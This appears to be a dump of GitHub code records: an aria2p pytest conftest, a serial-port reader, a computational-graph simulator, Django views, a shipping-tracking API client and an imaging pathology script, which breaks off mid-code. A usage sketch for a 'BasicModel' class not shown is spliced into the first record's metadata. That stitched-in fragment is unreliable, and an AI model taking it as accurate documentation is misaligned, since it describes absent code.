"dd_nlp_arsenal/nn/base/basemodel.py", "file_name": "basemodel.py", "file_ext": "py", "file_size_in_byte": 1217, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 11, "dataset": "github-code", "pt": "61", "api": [{"api_name": "torch.nn", "line_number": 16, "usage_type": "attribute"}, {"api_name": "torch.load", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 40,
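A minimal usage sketch for the BasicModel wrapper above; the TinyNet subclass and its layer sizes are invented for illustration, and save() writes to ./checkpoints/ exactly as the class defines:

```python
import torch

class TinyNet(BasicModel):           # BasicModel from the snippet above
    def __init__(self):
        super().__init__()
        self.fc = torch.nn.Linear(8, 2)

    def forward(self, x):
        return self.fc(x)

model = TinyNet()
model.save()  # -> checkpoints/TinyNet_<timestamp>.pth (name built by save())
# A fresh instance can restore the weights from the file save() produced:
# TinyNet().load("checkpoints/TinyNet_0412_10:30:00.pth")
```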
"usage_type": "call"}, {"api_name": "time.strftime", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 43, "usage_type": "call"}]} +{"seq_id": "20606690100", "text": "\"\"\"Configuration for the pytest test suite.\"\"\"\n\nimport json\nimport os\nimport random\nimport subprocess\nimport sys\nimport time\nfrom pathlib import Path\n\nimport pytest\nimport requests\n\nfrom aria2p import API, Client, enable_logger\n\nfrom . import CONFIGS_DIR, SESSIONS_DIR\n\n\n@pytest.fixture(autouse=True)\ndef tests_logs(request):\n # put logs in tests/logs\n log_path = Path(\"tests\") / \"logs\"\n\n # tidy logs in subdirectories based on test module and class names\n module = request.module\n class_ = request.cls\n name = request.node.name + \".log\"\n\n if module:\n log_path /= module.__name__.replace(\"tests.\", \"\")\n if class_:\n log_path /= class_.__name__\n\n log_path.mkdir(parents=True, exist_ok=True)\n\n # append last part of the name and enable logger\n log_path /= name\n if log_path.exists():\n log_path.unlink()\n enable_logger(sink=log_path, level=os.environ.get(\"PYTEST_LOG_LEVEL\", \"TRACE\"))\n\n\ndef spawn_and_wait_server(port=8779):\n process = subprocess.Popen(\n [\n sys.executable,\n \"-m\",\n \"uvicorn\",\n \"tests.http_server:app\",\n \"--port\",\n str(port),\n ],\n stdout=subprocess.DEVNULL,\n stderr=subprocess.DEVNULL,\n )\n while True:\n try:\n requests.get(f\"http://localhost:{port}/1024\")\n except:\n time.sleep(0.1)\n else:\n break\n return process\n\n\n@pytest.fixture(scope=\"session\", autouse=True)\ndef http_server(tmp_path_factory, worker_id):\n if worker_id == \"master\":\n # single worker: just run the HTTP server\n process = spawn_and_wait_server()\n yield process\n process.kill()\n process.wait()\n return\n\n # get the temp directory shared by all workers\n root_tmp_dir = tmp_path_factory.getbasetemp().parent\n\n # try to get a lock\n lock = root_tmp_dir / \"lock\"\n try:\n lock.mkdir(exist_ok=False)\n except FileExistsError:\n yield # failed, don't run the HTTP server\n return\n\n # got the lock, run the HTTP server\n process = spawn_and_wait_server()\n yield process\n process.kill()\n process.wait()\n\n\nclass _Aria2Server:\n def __init__(self, tmp_dir, port, config=None, session=None, secret=\"\"):\n self.tmp_dir = tmp_dir\n self.port = port\n\n # create the command used to launch an aria2c process\n command = [\n \"aria2c\",\n f\"--dir={self.tmp_dir}\",\n \"--file-allocation=none\",\n \"--quiet\",\n \"--enable-rpc=true\",\n f\"--rpc-listen-port={self.port}\",\n ]\n if config:\n command.append(f\"--conf-path={config}\")\n else:\n # command.append(\"--no-conf\")\n config = CONFIGS_DIR / \"default.conf\"\n command.append(f\"--conf-path={config}\")\n if session:\n if isinstance(session, list):\n session_path = self.tmp_dir / \"_session.txt\"\n with open(session_path, \"w\") as stream:\n stream.write(\"\\n\".join(session))\n command.append(f\"--input-file={session_path}\")\n else:\n session_path = SESSIONS_DIR / session\n if not session_path.exists():\n raise ValueError(f\"no such session: {session}\")\n command.append(f\"--input-file={session_path}\")\n if secret:\n command.append(f\"--rpc-secret={secret}\")\n\n self.command = command\n self.process = None\n\n # create the client with port\n self.client = Client(port=self.port, secret=secret, timeout=20)\n\n # create the API instance\n self.api = API(self.client)\n\n def start(self):\n while True:\n # create the subprocess\n self.process = subprocess.Popen(self.command)\n\n # make sure the 
server is running\n retries = 5\n while retries:\n try:\n self.client.list_methods()\n except requests.ConnectionError:\n time.sleep(0.1)\n retries -= 1\n else:\n break\n\n if retries:\n break\n\n def wait(self):\n while True:\n try:\n self.process.wait()\n except subprocess.TimeoutExpired:\n pass\n else:\n break\n\n def terminate(self):\n self.process.terminate()\n self.wait()\n\n def kill(self):\n self.process.kill()\n self.wait()\n\n def rmdir(self, directory=None):\n if directory is None:\n directory = self.tmp_dir\n for item in directory.iterdir():\n if item.is_dir():\n self.rmdir(item)\n else:\n item.unlink()\n directory.rmdir()\n\n def destroy(self, force=False):\n if force:\n self.kill()\n else:\n self.terminate()\n self.rmdir()\n\n\nclass Aria2Server:\n def __init__(self, tmp_dir, port, config=None, session=None, secret=\"\"):\n self.server = _Aria2Server(tmp_dir, port, config, session, secret)\n\n def __enter__(self):\n self.server.start()\n return self.server\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.server.destroy(force=True)\n\n\nports_file = Path(\".ports.json\")\n\n\ndef get_lock():\n lockdir = Path(\".lockdir\")\n while True:\n try:\n lockdir.mkdir(exist_ok=False)\n except FileExistsError:\n time.sleep(0.025)\n else:\n break\n\n\ndef release_lock():\n Path(\".lockdir\").rmdir()\n\n\ndef get_random_port():\n return random.randint(15000, 16000)\n\n\ndef get_current_ports():\n try:\n return json.loads(ports_file.read_text())\n except FileNotFoundError:\n return []\n\n\ndef set_current_ports(ports):\n ports_file.write_text(json.dumps(ports))\n\n\ndef reserve_port():\n get_lock()\n\n ports = get_current_ports()\n port_number = get_random_port()\n while port_number in ports:\n port_number = get_random_port()\n ports.append(port_number)\n set_current_ports(ports)\n\n release_lock()\n return port_number\n\n\ndef release_port(port_number):\n get_lock()\n ports = get_current_ports()\n ports.remove(port_number)\n set_current_ports(ports)\n release_lock()\n\n\n@pytest.fixture\ndef port():\n port_number = reserve_port()\n yield port_number\n release_port(port_number)\n\n\n@pytest.fixture\ndef server(tmp_path, port):\n with Aria2Server(tmp_path, port) as server:\n yield server\n", "repo_name": "pawamoy/aria2p", "sub_path": "tests/conftest.py", "file_name": "conftest.py", "file_ext": "py", "file_size_in_byte": 6597, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 420, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pathlib.Path", "line_number": 22, "usage_type": "call"}, {"api_name": "aria2p.enable_logger", "line_number": 40, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 40, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 40, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 19, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 44, "usage_type": "call"}, {"api_name": "sys.executable", "line_number": 46, "usage_type": "attribute"}, {"api_name": "subprocess.DEVNULL", "line_number": 53, "usage_type": "attribute"}, {"api_name": "subprocess.DEVNULL", "line_number": 54, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 58, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 60, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 66, "usage_type": "call"}, {"api_name": "aria2p.Client", "line_number": 132, "usage_type": "call"}, {"api_name": "aria2p.API", "line_number": 135, "usage_type": "call"}, {"api_name": 
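The conftest above serializes port reservation across pytest-xdist workers with a directory-based lock: mkdir is atomic, so exactly one process can create .lockdir at a time. The same idiom in isolation — a sketch with names of my choosing, not taken from the file:

```python
import time
from contextlib import contextmanager
from pathlib import Path

@contextmanager
def mkdir_lock(path=".lockdir", poll=0.025):
    lock = Path(path)
    while True:
        try:
            lock.mkdir(exist_ok=False)   # atomic: only one process succeeds
            break
        except FileExistsError:
            time.sleep(poll)             # another process holds the lock
    try:
        yield
    finally:
        lock.rmdir()                     # release

with mkdir_lock():
    pass  # critical section, e.g. read-modify-write of a shared ports file
```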
"subprocess.Popen", "line_number": 140, "usage_type": "call"}, {"api_name": "requests.ConnectionError", "line_number": 147, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 148, "usage_type": "call"}, {"api_name": "subprocess.TimeoutExpired", "line_number": 160, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 203, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 207, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 212, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 218, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 222, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 227, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 233, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 258, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 265, "usage_type": "attribute"}]} +{"seq_id": "19579610439", "text": "import serial\r\n#the port will depend on your computer\r\n#for a linux it will probably be /dev/ttyACM0\r\n#PORT = \"/dev/ttyACM0\"\r\n#for windows it will be COM(something), typically COM 6 or COM 11\r\nPORT = \"COM6\"\r\n\r\nBAUD = 115200\r\n\r\ns = serial.Serial(PORT)\r\ns.baudrate = BAUD\r\ns.parity = serial.PARITY_NONE\r\ns.databits = serial.EIGHTBITS\r\ns.stopbits = serial.STOPBITS_ONE\r\nnewList =[]\r\ntry:\r\n while True:\r\n #read a line from the microbit, decode it and strip the whitespace at the end\r\n data = s.readline().decode(\"ascii\").rstrip()\r\n \r\n #split the string into several substrings separated by \" \"\r\n data_s = data.split(\" \")\r\n #print(data_s)\r\n \r\n # get the first string\r\n message = data_s[0]\r\n #print(message)\r\n if message == \"Traceback\":\r\n break\r\n newList.append(message)\r\n print(\"Max length of my List is \",newList[len(newList)-1])\r\nfinally:\r\n s.close()\r\n", "repo_name": "abinalex22/Algorithm", "sub_path": "chronometer/maxListSupporttedSerialPort.py", "file_name": "maxListSupporttedSerialPort.py", "file_ext": "py", "file_size_in_byte": 955, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "serial.Serial", "line_number": 10, "usage_type": "call"}, {"api_name": "serial.PARITY_NONE", "line_number": 12, "usage_type": "attribute"}, {"api_name": "serial.EIGHTBITS", "line_number": 13, "usage_type": "attribute"}, {"api_name": "serial.STOPBITS_ONE", "line_number": 14, "usage_type": "attribute"}]} +{"seq_id": "34755385255", "text": "from pydeeptoy.computational_graph import *\nfrom itertools import takewhile\nfrom itertools import chain\n\n\nclass SimulationContext:\n def __init__(self):\n self.data_bag = dict()\n\n def get_data(self, key):\n if key not in self.data_bag:\n self.data_bag[key] = ConnectionData(value=key.init_value)\n\n return self.data_bag[key]\n\n def __getitem__(self, key):\n return self.get_data(key)\n\n def __setitem__(self, key, value):\n self.data_bag[key] = value\n\n @staticmethod\n def sort_topologically(cg: ComputationalGraph, out=list()):\n sorted_nodes = []\n\n def depth_first_search(on_vertex_finished):\n discovered = dict()\n finished = dict()\n\n def visit(vertex, time):\n time += 1\n discovered[vertex] = time\n\n for v in cg.get_adjacent_in_nodes(vertex):\n if v not in discovered:\n time = visit(v, time)\n\n time += 1\n finished[vertex] = time\n on_vertex_finished(time, vertex)\n return time\n\n time = 0\n root_nodes = 
chain.from_iterable([cg.adjacencyOutMap[c] for c in out]) if len(out) > 0 else cg.nodes\n for v in root_nodes:\n if v not in discovered:\n time = visit(v, time)\n\n depth_first_search(lambda time, node: sorted_nodes.insert(0, node))\n\n sorted_nodes.reverse()\n return sorted_nodes\n\n def forward(self, cg: ComputationalGraph, params=dict(), out=list()):\n for p, v in params.items():\n self.get_data(p).value = v\n\n for node in self.sort_topologically(cg, out):\n node.forward(self)\n\n def backward(self, cg: ComputationalGraph, reset_gradient=True, out=list()):\n if reset_gradient:\n for i in cg.outputs:\n self.get_data(i).reset_gradient(to_value=1)\n [node.backward(self) for node in reversed(self.sort_topologically(cg))]\n\n def forward_backward(self, cg: ComputationalGraph, params=dict(), reset_gradient=True, out=list()):\n self.forward(cg, params, out=out)\n self.backward(cg, reset_gradient=reset_gradient, out=out)\n\n\n", "repo_name": "stormy-ua/DeepLearningToy", "sub_path": "src/pydeeptoy/simulation.py", "file_name": "simulation.py", "file_ext": "py", "file_size_in_byte": 2244, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "61", "api": [{"api_name": "itertools.chain.from_iterable", "line_number": 44, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 44, "usage_type": "name"}]} +{"seq_id": "72489670914", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render,redirect\nfrom .models import Skill,Project\n\n# Create your views here.\nclass SkillsViews(object):\n\t\"\"\"docstring for SkillsViews\"\"\"\n\t@staticmethod\n\tdef skills(request):\n\t\tskills = Skill.objects.all()\n\t\tprint(request.user)\n\t\tprint(request.user.is_staff)\n\t\tcontext = {\n\t\t\t\"title\":\"Skills\",\n\t\t\t\"skills\":skills\n\t\t\t}\n\t\treturn render(request,\"skills.html\",context)\n\t\n\t@staticmethod\n\tdef show_projects(request):\n\t\tprojects = Project.objects.all()\n\t\tnew_projects = []\n\t\tfor i in range(len(projects)):\n\t\t\tnew_projects.append({\"instance\":projects[i],\"result\":i % 2 == 0})\n\t\tprint(new_projects[0]['instance'].get_url())\n\n\t\tcontext ={\n\t\t\t\"title\":\"Projects\",\n\t\t\t\"projects\": new_projects\n\n\t\t}\n\t\treturn render(request, \"projects.html\",context)\n\t@staticmethod\n\tdef get_project(request,id):\n\t\tproject = Project.objects.get(id=int(id))\n\t\tcontext ={\n\t\t\t\"title\":\"Project\",\n\t\t\t\"project\": project\n\n\t\t}\n\t\t\n\t\treturn render(request, \"project.html\",context)\n\n\t@staticmethod\n\tdef form_sessions(request):\n\t\tcontext = {\n\t\t\t'title':'examp'\n\t\t}\n\t\treturn render(request,\"sessions_example.html\",context)\n\n\t@staticmethod\n\tdef add_sessions(request):\n\t\tprint(request.session['some_text'])\n\t\tleadboard = request.session.get(\"leadboard\",[])\n\t\tleadboard += [{'name':request.GET.get(\"name\",\"\"),\"score\":0}]\n\t\trequest.session.update({\"leadboard\":leadboard})\n\n\t\treturn redirect(\"skills:form\")\n\n[{'name':'peter',\"score\":0}] + [{'name':'peter',\"score\":0}] == [{'name':'peter',\"score\":0},{'name':'peter',\"score\":0}] \n", "repo_name": "Lairion/MainAcadProg", "sub_path": "skills/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1570, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "models.Skill.objects.all", "line_number": 12, "usage_type": "call"}, {"api_name": 
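The simulation module above orders computational-graph nodes with a recursive depth-first search before running forward(). The same idea on a plain adjacency dict — a self-contained sketch, independent of pydeeptoy's classes:

```python
def topo_sort(graph):
    """graph maps node -> list of input nodes (like get_adjacent_in_nodes)."""
    seen, ordered = set(), []

    def visit(v):
        seen.add(v)
        for u in graph.get(v, []):
            if u not in seen:
                visit(u)
        ordered.append(v)        # a node finishes after all of its inputs

    for v in graph:
        if v not in seen:
            visit(v)
    return ordered               # inputs appear before their consumers

print(topo_sort({"a": [], "b": [], "c": ["a", "b"], "d": ["c"]}))
# ['a', 'b', 'c', 'd'] -- a safe evaluation order for a forward pass
```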
"models.Skill.objects", "line_number": 12, "usage_type": "attribute"}, {"api_name": "models.Skill", "line_number": 12, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 19, "usage_type": "call"}, {"api_name": "models.Project.objects.all", "line_number": 23, "usage_type": "call"}, {"api_name": "models.Project.objects", "line_number": 23, "usage_type": "attribute"}, {"api_name": "models.Project", "line_number": 23, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 34, "usage_type": "call"}, {"api_name": "models.Project.objects.get", "line_number": 37, "usage_type": "call"}, {"api_name": "models.Project.objects", "line_number": 37, "usage_type": "attribute"}, {"api_name": "models.Project", "line_number": 37, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 44, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 51, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 60, "usage_type": "call"}]} +{"seq_id": "3611216298", "text": "import json\nimport time\nimport importlib\nimport requests\nfrom hashlib import sha256, md5\nfrom flask_babel import gettext as _\nfrom app.helpers import log_info\nfrom app.models.sys import SysSetting\nfrom app.models.shipping import Shipping\nfrom app.exception import ShippingException\n\n\nclass TrackServiceFactory(object):\n \"\"\"物流查询工厂类\"\"\"\n\n @staticmethod\n def get_trackservice():\n vendor = SysSetting.query.filter(\n SysSetting.key == 'shipping_vendor').first()\n if vendor is None:\n raise ShippingException(_(u'快递配置查询不存在'))\n TrackClassService = vendor.value\n mod = importlib.import_module(__name__)\n return getattr(mod, TrackClassService)()\n\n\nclass TrackService(object):\n \"\"\" 物流查询 \"\"\"\n\n def __init__(self):\n # 快递id\n self.shipping_id = 0\n\n # 快递单号\n self.shipping_sn = ''\n\n # config_key\n self.config_key = ''\n\n # 快递信息\n self.shipping = None\n\n # 快递服务配置\n self.config = None\n\n # 快递查询接口url\n self.apiurl = ''\n\n # 收件人电话\n self.receive_phone = ''\n\n def _init_(self):\n \"\"\"加载快递信息\"\"\"\n self.shipping = Shipping.query.get(self.shipping_id)\n if self.shipping is None:\n raise ShippingException(_(u'快递id不存在'))\n\n config = SysSetting.query.filter(\n SysSetting.key == self.config_key).first()\n if config is None:\n raise ShippingException(_(u'快递配置不存在'))\n try:\n self.shipping_config = json.loads(config.value)\n except Exception as e:\n raise ShippingException(e)\n\n def _get_track_response(self):\n \"\"\"获取跟踪数据\"\"\"\n try:\n self._init_()\n self._check_req_params()\n data = self._get_req_params()\n\n except ShippingException as e:\n raise e\n\n try:\n res = requests.post(self.apiurl, data, timeout=10)\n except Exception as e:\n log_info('[TrackService] [Error] NetWorkException. 
%s, %s' % (self.apiurl, data))\n raise ShippingException(_(u'查询失败,网络异常!'))\n\n res.encoding = 'utf-8'\n if res.status_code != 200:\n raise ShippingException(u'查询失败,网络状态为%d' % res.status_code)\n return res\n\n def _check_req_params(self):\n \"\"\"检查请求参数\"\"\"\n if self.shipping_sn is None:\n raise ShippingException(_(u'缺少快递单号'))\n\n # 快递分单则默认查询首个订单号\n _temp_sn_list = self.shipping_sn.split()\n if _temp_sn_list is not None and len(_temp_sn_list) >= 2:\n self.shipping_sn = _temp_sn_list[0]\n\n def _get_req_params(self):\n \"\"\"获取请求参数,子类实现\"\"\"\n pass\n\n def track(self, shipping_id, shipping_sn, receive_phone):\n \"\"\" 快递查询数据,子类重载 \"\"\"\n pass\n\n\nclass Shipping100TrackService(TrackService):\n \"\"\" 快递100物流查询 \"\"\"\n def __init__(self):\n TrackService.__init__(self)\n self.config_key = 'config_shipping'\n self.apiurl = 'https://poll.kuaidi100.com/poll/query.do'\n\n def _get_req_params(self):\n params = {\n 'com': self.shipping.shipping_code,\n 'num': self.shipping_sn,\n }\n\n # 拼接字符串后MD5加密,字符串转大写\n conf = self.shipping_config\n json_params = json.dumps(params)\n temp_sign = u'%s%s%s' % (json_params, conf['key'], conf['customer'])\n sign = md5(temp_sign.encode('utf-8')).hexdigest()\n sign = sign.upper()\n\n # 请求接口参数\n return {\n 'customer': conf['customer'],\n 'param': json_params,\n 'sign': sign\n }\n\n def track(self, shipping_id, shipping_sn, receive_phone=''):\n \"\"\" 查询 \"\"\"\n self.shipping_id = shipping_id\n self.shipping_sn = shipping_sn\n try:\n res = self._get_track_response()\n except ShippingException as e:\n log_info(u'[Shipping100TrackService] [Error] shipping_code:%s, shipping_sn:%s, ShippingException:%s' % (self.shipping.shipping_code, self.shipping_sn, e))\n raise e\n\n resjson = res.json()\n if resjson['message'] != 'ok':\n log_info(u'[Shipping100TrackService] [Error] shipping_code:%s, shipping_sn:%s, response message:%s' % (self.shipping.shipping_code, self.shipping_sn, resjson['message']))\n raise ShippingException(_(u'查询失败'))\n\n return resjson['data']\n\n\nclass ShippingAggreateTrackService(TrackService):\n \"\"\" 聚合数据物流查询 \"\"\"\n def __init__(self):\n TrackService.__init__(self)\n self.config_key = 'config_shipping_aggreate'\n self.apiurl = 'http://v.juhe.cn/exp/index'\n\n def _get_req_params(self):\n # 顺丰需要发件人或收件人手机号后4位\n receiverPhone = ''\n if self.shipping.aggreate_code == 'sf':\n if self.receive_phone is None:\n raise ShippingException(_(u'查询失败,缺少收件人手机号'))\n\n if len(self.receive_phone) < 11:\n raise ShippingException(_(u'查询失败,收件人手机号错误'))\n\n receiverPhone = self.receive_phone[-4:]\n log_info(u'[ShippingAggreateTrackService] [info] receiverPhone: %s' % receiverPhone)\n\n return {\n 'com': self.shipping.aggreate_code,\n 'no': self.shipping_sn,\n 'key': self.shipping_config['key'],\n 'dtype': 'json',\n 'receiverPhone': receiverPhone,\n }\n\n def track(self, shipping_id, shipping_sn, receive_phone=''):\n \"\"\"查询\"\"\"\n self.shipping_id = shipping_id\n self.shipping_sn = shipping_sn\n self.receive_phone = receive_phone\n try:\n res = self._get_track_response()\n except ShippingException as e:\n log_info(u'[ShippingAggreateTrackService] [Error] shipping_code:%s, shipping_sn:%s, ShippingException:%s' % (self.shipping.shipping_code, self.shipping_sn, e))\n raise e\n\n resjson = res.json()\n if resjson['error_code'] != 0 or not resjson['result']:\n log_info(u'[ShippingAggreateTrackService] [Error] shipping_code:%s, shipping_sn:%s, response error_code:%s' % (self.shipping.shipping_code, self.shipping_sn, resjson['error_code']))\n raise 
ShippingException(_(u'查询失败'))\n\n _track_list = resjson['result']['list']\n track_list = [{\n 'time': item['datetime'],\n 'ftime': item['datetime'],\n 'context': item['remark']\n } for item in _track_list]\n track_list.reverse()\n return track_list\n", "repo_name": "kapokcloud-inc/theonestore", "sub_path": "app/services/track.py", "file_name": "track.py", "file_ext": "py", "file_size_in_byte": 6888, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 12, "dataset": "github-code", "pt": "61", "api": [{"api_name": "app.models.sys.SysSetting.query.filter", "line_number": 18, "usage_type": "call"}, {"api_name": "app.models.sys.SysSetting.query", "line_number": 18, "usage_type": "attribute"}, {"api_name": "app.models.sys.SysSetting", "line_number": 18, "usage_type": "name"}, {"api_name": "app.models.sys.SysSetting.key", "line_number": 19, "usage_type": "attribute"}, {"api_name": "app.models.sys.SysSetting", "line_number": 19, "usage_type": "name"}, {"api_name": "app.exception.ShippingException", "line_number": 21, "usage_type": "call"}, {"api_name": "flask_babel.gettext", "line_number": 21, "usage_type": "call"}, {"api_name": "importlib.import_module", "line_number": 23, "usage_type": "call"}, {"api_name": "app.models.shipping.Shipping.query.get", "line_number": 54, "usage_type": "call"}, {"api_name": "app.models.shipping.Shipping.query", "line_number": 54, "usage_type": "attribute"}, {"api_name": "app.models.shipping.Shipping", "line_number": 54, "usage_type": "name"}, {"api_name": "app.exception.ShippingException", "line_number": 56, "usage_type": "call"}, {"api_name": "flask_babel.gettext", "line_number": 56, "usage_type": "call"}, {"api_name": "app.models.sys.SysSetting.query.filter", "line_number": 58, "usage_type": "call"}, {"api_name": "app.models.sys.SysSetting.query", "line_number": 58, "usage_type": "attribute"}, {"api_name": "app.models.sys.SysSetting", "line_number": 58, "usage_type": "name"}, {"api_name": "app.models.sys.SysSetting.key", "line_number": 59, "usage_type": "attribute"}, {"api_name": "app.models.sys.SysSetting", "line_number": 59, "usage_type": "name"}, {"api_name": "app.exception.ShippingException", "line_number": 61, "usage_type": "call"}, {"api_name": "flask_babel.gettext", "line_number": 61, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 63, "usage_type": "call"}, {"api_name": "app.exception.ShippingException", "line_number": 65, "usage_type": "call"}, {"api_name": "app.exception.ShippingException", "line_number": 74, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 78, "usage_type": "call"}, {"api_name": "app.helpers.log_info", "line_number": 80, "usage_type": "call"}, {"api_name": "app.exception.ShippingException", "line_number": 81, "usage_type": "call"}, {"api_name": "flask_babel.gettext", "line_number": 81, "usage_type": "call"}, {"api_name": "app.exception.ShippingException", "line_number": 85, "usage_type": "call"}, {"api_name": "app.exception.ShippingException", "line_number": 91, "usage_type": "call"}, {"api_name": "flask_babel.gettext", "line_number": 91, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 122, "usage_type": "call"}, {"api_name": "hashlib.md5", "line_number": 124, "usage_type": "call"}, {"api_name": "app.exception.ShippingException", "line_number": 140, "usage_type": "name"}, {"api_name": "app.helpers.log_info", "line_number": 141, "usage_type": "call"}, {"api_name": "app.helpers.log_info", "line_number": 146, "usage_type": "call"}, {"api_name": 
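TrackServiceFactory above turns a class name stored in the database into an instance via importlib. A stripped-down version of that lookup-by-string pattern — the module and class names here are invented for the demo:

```python
import importlib

def make_service(class_name, module_name=__name__):
    """Instantiate a class chosen at runtime by its string name."""
    mod = importlib.import_module(module_name)
    return getattr(mod, class_name)()    # AttributeError if the name is wrong

class EchoTrackService:
    def track(self, sn):
        return "tracking %s" % sn

service = make_service("EchoTrackService")
print(service.track("SF1234567890"))     # tracking SF1234567890
```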
"app.exception.ShippingException", "line_number": 147, "usage_type": "call"}, {"api_name": "flask_babel.gettext", "line_number": 147, "usage_type": "call"}, {"api_name": "app.exception.ShippingException", "line_number": 164, "usage_type": "call"}, {"api_name": "flask_babel.gettext", "line_number": 164, "usage_type": "call"}, {"api_name": "app.exception.ShippingException", "line_number": 167, "usage_type": "call"}, {"api_name": "flask_babel.gettext", "line_number": 167, "usage_type": "call"}, {"api_name": "app.helpers.log_info", "line_number": 170, "usage_type": "call"}, {"api_name": "app.exception.ShippingException", "line_number": 187, "usage_type": "name"}, {"api_name": "app.helpers.log_info", "line_number": 188, "usage_type": "call"}, {"api_name": "app.helpers.log_info", "line_number": 193, "usage_type": "call"}, {"api_name": "app.exception.ShippingException", "line_number": 194, "usage_type": "call"}, {"api_name": "flask_babel.gettext", "line_number": 194, "usage_type": "call"}]} +{"seq_id": "39754656236", "text": "#!/usr/bin/env python\n\n\"\"\"\nImage level analysis of broad pathological features of IMC samples.\n\"\"\"\n\nimport typing as tp\n\nfrom tqdm import tqdm\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport skimage\nimport parmap\n\nfrom imc.types import Path, Array, DataFrame\nfrom imc.graphics import close_plots\n\nfrom src._config import prj, config\n\n\noutput_dir = (config.results_dir / \"pathology\").mkdir()\n\n\ndef main() -> int:\n\n # Lacunarity\n lac = quantify_lacunar_space()\n interpret_metric(lac, \"lacunarity\")\n\n # Fibrosis\n fib1 = score_marker(channel=\"ColTypeI(Tm169)\")\n interpret_metric(fib1, \"fibrosis_collagen\")\n\n fib2 = score_marker(channel=\"Periostin(Dy161)\")\n interpret_metric(fib2, \"fibrosis_periostin\")\n\n fib3 = score_marker(channel=\"CC16(Dy163)\")\n interpret_metric(fib3, \"CC16_bleeding\")\n # Check CC16 abundance only in airway ROIS\n score_compartment_specific(channel=\"CC16(Dy163)\")\n\n fib4 = score_marker(channel=\"CitH3(Sm154)\")\n interpret_metric(fib4, \"CitH3\")\n\n # Combine both\n # # weighted by the relative mean of the channels across images\n chs = [\"ColTypeI(Tm169)\", \"Periostin(Dy161)\"]\n metrics = pd.read_csv(\n config.results_dir / \"roi_channel_stats.csv\", index_col=[\"roi\", \"channel\"]\n )\n m = metrics.loc[:, chs, :].groupby(\"channel\")[\"mean\"].mean()\n r = m[chs[0]] / m[chs[1]]\n\n fib = pd.concat([fib1, fib2 * r]).groupby(level=0).mean()\n interpret_metric(fib, \"fibrosis_joint\")\n\n # Vessels\n # # (CD31, AQP1, aSMA, fill holes)\n\n return 0\n\n\ndef score_compartment_specific(\n channel: str = \"CC16(Dy163)\",\n attribute_name: str = \"CC16_bleeding_airways\",\n compartment: str = \"A\",\n compartment_name=\"airways\",\n):\n from src.analysis import get_domain_areas\n\n areas = get_domain_areas()\n\n f = output_dir / f\"extent_and_intensity.{channel}_quantification.csv\"\n if not f.exists():\n fib = score_marker(channel=channel)\n fib = pd.read_csv(f, index_col=0)\n\n interpret_metric(\n fib.loc[(areas[compartment] > 0)], f\"{attribute_name}_{compartment_name}\"\n )\n interpret_metric(\n fib.loc[(areas[compartment] == 0)], f\"{attribute_name}_non{compartment_name}\"\n )\n\n\ndef quantify_lacunar_space(overwrite: bool = False):\n f = output_dir / \"lacunarity.quantification.csv\"\n\n if not f.exists() or overwrite:\n _res = parmap.map(get_lacunae, prj.rois, pm_pbar=True)\n res = pd.DataFrame(\n [(x > 0).sum() for x in _res],\n index=[r.name for r in prj.rois],\n 
